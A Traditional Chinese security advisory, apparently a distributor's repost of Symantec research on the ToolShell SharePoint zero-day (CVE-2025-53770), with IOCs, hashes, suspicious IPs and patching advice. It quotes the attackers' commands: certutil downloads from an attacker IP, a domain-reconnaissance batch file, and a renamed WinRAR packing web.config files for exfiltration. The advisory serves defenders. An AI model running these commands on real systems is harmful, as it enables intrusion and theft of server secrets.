top of page
  • Facebook
  • LinkedIn
  • X
  • YouTube

ToolShell 零日漏洞現身:攻擊者可遠端掌控 SharePoint 伺服器

已更新:7月28日

關鍵摘要:

  • 漏洞名稱:ToolShell(CVE-2025-53770)

  • 影響平台:SharePoint Server 2016(未修補)、2019、Subscription Edition(已修補)

  • 危害描述:未經驗證的遠端攻擊者可取得伺服器完整控制權,執行任意程式、存取檔案系統。

  • 漏洞源頭:為 2025 年 7 月剛修補的 CVE-2025-49704 變種

  • 攻擊活動:已在全球實際觀察到惡意攻擊行為,包含植入惡意 PowerShell、遠端下載、橫向擴散、打包 exfiltration 等完整鏈條。

  • 工具與手法:使用 certutil、PowerShell、WinRAR(改名為 backup.exe)等工具竊取與打包伺服器資訊,攻擊技巧老練。


Symantec 產品已可封鎖 CVE-2025-53770 漏洞攻擊行為

  • 2025 年 7 月 22 日 13:23 UTC 更新:已補充漏洞攻擊活動的資料。

  • 2025 年 7 月 22 日 12:37 UTC 更新:已新增更多有關後續攻擊行為的細節。

  • 2025 年 7 月 21 日 10:40 UTC 更新:已新增更多指標(IOC)。

圖 1. 攻擊活動時間分布:2025 年 7 月 17 至 7 月 22 日
圖 1. 攻擊活動時間分布:2025 年 7 月 17 至 7 月 22 日

防護措施

Symantec 產品已透過以下網路防護技術封鎖此漏洞的攻擊行為:

  • Web Attack: Microsoft SharePoint CVE-2025-49704


相關漏洞

另一個相關漏洞(CVE-2025-53771)也已獲得修補。此為一個路徑穿越漏洞,允許授權攻擊者在網路中進行冒充攻擊。這同樣是 2025 年 7 月修補漏洞 CVE-2025-49706 的變種,而本次修補更增強了對該舊漏洞的防護。


後續攻擊活動

在部分發生後續攻擊的網路中,攻擊者首先執行了一段編碼過的 PowerShell 指令,接著使用 certutil 下載名為 client.exe 的檔案(SHA256:fd03d881f0b3069f5adec6ae69181899e72fd27b3e75bb9075d0798ed3184274)自 134.199.202[.]205,並將其儲存為 debug.js:

powershell -Command "certutil -urlcache -split -f http://134.199.202.205/client.exe C:\Windows\Temp\client.exe >'C:\Program Files\Common Files\microsoft shared\Web Server Extensions\16\TEMPLATE\LAYOUTS\debug.js'"

接著使用 PowerShell 以 –value 參數傳遞命令,如:

powershell -Command "Set-Content -Path 'C:\Program Files\Common Files\microsoft shared\Web Server Extensions\16\TEMPLATE\LAYOUTS\debug.js' -Value (whoami)" powershell -Command "Set-Content -Path 'C:\Program Files\Common Files\microsoft shared\Web Server Extensions\16\TEMPLATE\LAYOUTS\debug.js' -Value (tasklist /svc)"

debug.js 的命名可能是為了讓檔案看起來無害。此檔案之後執行了位於 c:\temp\test.bat 的批次檔,內容如下:

/c query user > query_user.txt && tasklist /svc > tasklist_info.txt && ipconfig /all > ipconfig_all.txt && net user > net_user.txt && net user /domain > net_user_domain.txt && net accounts /domain > net_accounts_domain.txt && net group /domain > net_group_domain.txt && net group Domain Admins /domain > net_group_Domain_Admins_domain.txt && net group Domain Controllers /domain > net_group_Domain_Controllers_domain.txt && net group Domain Computers /domain > net_group_Domain_Computers_domain.txt && nltest /domain_trusts > domain_trusts.txt && net view > net_view.txt && net start > net_start.txt && systeminfo > systeminfo.txt && arp -a > arp_a.txt

執行的檔案還包括:

  • powershell.exe

  • tasklist.exe

  • ipconfig.exe

  • net.exe

  • nltest.exe

  • systeminfo.exe

  • backup.exe

  • arp.exe

其中,backup.exe 是改名後的 WinRAR,被用來竊取機密資訊,如:

/c backup.exe a -r -y logs.rar C:\\inetpub\\wwwroot\\wss\\VirtualDirectories\\**\\web.config /c backup.exe a -r -y -df log.rar c:\\*.txt C:\\inetpub\\wwwroot\\wss\\VirtualDirectories\\**\\web.config

此外,也使用 certutil 下載名為 agent.x64.exe 的檔案(SHA256:04f7326c40c33fda51010d067915a1e50b63e00b4ab86db00158d5e067a78ff6),用來啟動 project1.exe(SHA256:430cf700c7f1b625fded4da4084a0a6c0240b15d52e624a2361bc2512ca2355d):

certutil -urlcache -split -f http://134.199.202.205/agent.x64.exe C:\Users\Public\agent.x64.exe

🛡️ 防護現況與建議行動:

✅ 已防護產品:

  • Symantec Endpoint Security (SES) 及 Network Protection 已可攔截 CVE-2025-49704 相關變種攻擊(亦即 ToolShell)

  • 防護名稱:Web Attack: Microsoft SharePoint CVE-2025-49704


📌 建議行動清單(給 IT / 資安人員):

  1. 立即更新 SharePoint 至最新版,尤其是尚未修補的 2016 版本使用者需特別注意。

  2. 封鎖與監控下列可疑 IP:

    • 107.191.58[.]76、104.238.159[.]149、96.9.125[.]147 等

    • 總共列出 20+ 攻擊與掃描來源 IP(完整清單見原文)

  3. 掃描與分析 POST 請求中是否含有可疑路徑:

    • /layouts/15/ToolPane.aspx?DisplayMode=Edit

  4. 搜尋指令紀錄與惡意檔案路徑:

    • 如:debug.js, client.exe, agent.x64.exe, project1.exe

  5. 查看是否有以下 SHA256 檔案出現(IOC):

    • fd03d881f0b3069f5adec6ae69181899e72fd27b3e75bb9075d0798ed3184274

    • 04f7326c40c33fda51010d067915a1e50b63e00b4ab86db00158d5e067a78ff6

    • 430cf700c7f1b625fded4da4084a0a6c0240b15d52e624a2361bc2512ca2355d


📞 想知道自己是否在名單上?現在就與我們聯絡

ToolShell 的攻擊已經在實際環境中活躍進行。若您尚未確認環境是否暴露,或需要進一步防護建議、IOC 偵測工具、弱點掃描服務,請立即與 Symantec 亞洲區代理商 Westcon 台灣團隊聯繫,獲得專業技術支援。


原文出處 Symatnec Enterprise Blogs

留言


WESTCON LOGO

Partner Success. It’s what we do.

02-8751-8026

Taiwan 台北
10560 台北市松山區光復北路112號3樓


3F., No. 112, Guangfu N. Rd.,

Songshan Dist.,Taipei City 105035, Taiwan (R.O.C.)

訂閱中文電子報

Thanks for subscribing!

Taiwan 台中
40865 台中市南屯區文心路一段218號23樓 2318 室

Rm. 2318, 23F.,No. 218, Sec. 1,Wenxin Rd.,
Nantun Dist.,Taichung City 40865, Taiwan (R.O.C.)

© 2025 Westcon Taiwan

Taiwan 高雄
81369 高雄市左營區博愛四路2號3F-2

3F.-2, No. 2, Bo'ai 4th Rd.,Zuoying Dist.,
Kaohsiung City 81369 , Taiwan (R.O.C.)

bottom of page